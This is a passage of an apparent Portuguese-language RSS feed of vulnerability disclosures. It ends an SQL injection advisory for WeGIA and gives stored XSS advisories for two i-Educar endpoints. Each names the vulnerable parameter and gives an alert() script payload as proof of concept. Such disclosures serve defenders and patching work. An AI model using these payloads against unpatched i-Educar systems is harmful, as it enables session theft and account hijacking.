&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;id_socio=1&amp;amp;amp;pessoa=fisica
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53823/image.png&amp;#34;
	width=&amp;#34;1906&amp;#34;
	height=&amp;#34;732&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53823/image_hu_bf5d4673fc5021aa.png 480w, /p/cve-2025-53823/image_hu_3f7975a45248e0df.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;260&amp;#34;
		data-flex-basis=&amp;#34;624px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53823/image-1.png&amp;#34;
	width=&amp;#34;1912&amp;#34;
	height=&amp;#34;730&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53823/image-1_hu_137be9761b6d02cd.png 480w, /p/cve-2025-53823/image-1_hu_20fbca3e6290c25.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;261&amp;#34;
		data-flex-basis=&amp;#34;628px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-p8xr-qg3c-6ww2&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-p8xr-qg3c-6ww2&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7109</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-7109/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-7109/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7109-cross-site-scripting-xss-armazenado-no-endpoint-educar_aluno_beneficio_cadphp-parâmetro-benefício&amp;#34;&amp;gt;CVE-2025-7109: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_aluno_beneficio_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Benefício&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7109&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7109&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_aluno_beneficio_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Benefício&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_aluno_beneficio_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7109-cross-site-scripting-xss-armazenado-no-endpoint-educar_aluno_beneficio_cadphp-parâmetro-benefício&amp;#34;&amp;gt;CVE-2025-7109: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_aluno_beneficio_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Benefício&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7109&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7109&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_aluno_beneficio_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Benefício&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_aluno_beneficio_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Benefício&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;Benefício&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB PacXXX&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7109/image.png&amp;#34;
	width=&amp;#34;1875&amp;#34;
	height=&amp;#34;1001&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7109/image_hu_ce7d7ad02b44b12.png 480w, /p/cve-2025-7109/image_hu_9a61a6d6d6449abc.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;187&amp;#34;
		data-flex-basis=&amp;#34;449px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7109/image-1.png&amp;#34;
	width=&amp;#34;1889&amp;#34;
	height=&amp;#34;997&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7109/image-1_hu_60a60555d7528d3a.png 480w, /p/cve-2025-7109/image-1_hu_1abeeb2b65e62c22.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;189&amp;#34;
		data-flex-basis=&amp;#34;454px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7109/image-2.png&amp;#34;
	width=&amp;#34;1701&amp;#34;
	height=&amp;#34;1013&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7109/image-2_hu_ee4aa3fddc8a48a5.png 480w, /p/cve-2025-7109/image-2_hu_eb7ac958f3edf421.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;167&amp;#34;
		data-flex-basis=&amp;#34;403px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;vídeo-poc&amp;#34;&amp;gt;Vídeo PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/Pe33X_zm_TQ&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/Pe33X_zm_TQ&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7109.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7109.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7110</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-7110/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-7110/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7110-cross-site-scripting-xss-armazenado-no-endpoint-educar_escola_lstphp-parâmetro-escola&amp;#34;&amp;gt;CVE-2025-7110: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_escola_lst.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Escola&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7110&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7110&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_escola_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Escola&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_escola_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7110-cross-site-scripting-xss-armazenado-no-endpoint-educar_escola_lstphp-parâmetro-escola&amp;#34;&amp;gt;CVE-2025-7110: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;educar_escola_lst.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Escola&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7110&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7110&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_escola_lst.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Escola&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_escola_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Escola&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;Escola&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB i-Educar Pacxxx&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7110/image.png&amp;#34;
	width=&amp;#34;1886&amp;#34;
	height=&amp;#34;996&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7110/image_hu_b07da12df38ab222.png 480w, /p/cve-2025-7110/image_hu_ea38d215407e28e3.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;189&amp;#34;
		data-flex-basis=&amp;#34;454px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7110/image-1.png&amp;#34;
	width=&amp;#34;1805&amp;#34;
	height=&amp;#34;970&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7110/image-1_hu_eba69eb637b93ae8.png 480w, /p/cve-2025-7110/image-1_hu_e69951c2ec55d9fb.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;186&amp;#34;
		data-flex-basis=&amp;#34;446px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;vídeo-poc&amp;#34;&amp;gt;Vídeo PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/N3pu_GJHjCw&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/N3pu_GJHjCw&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
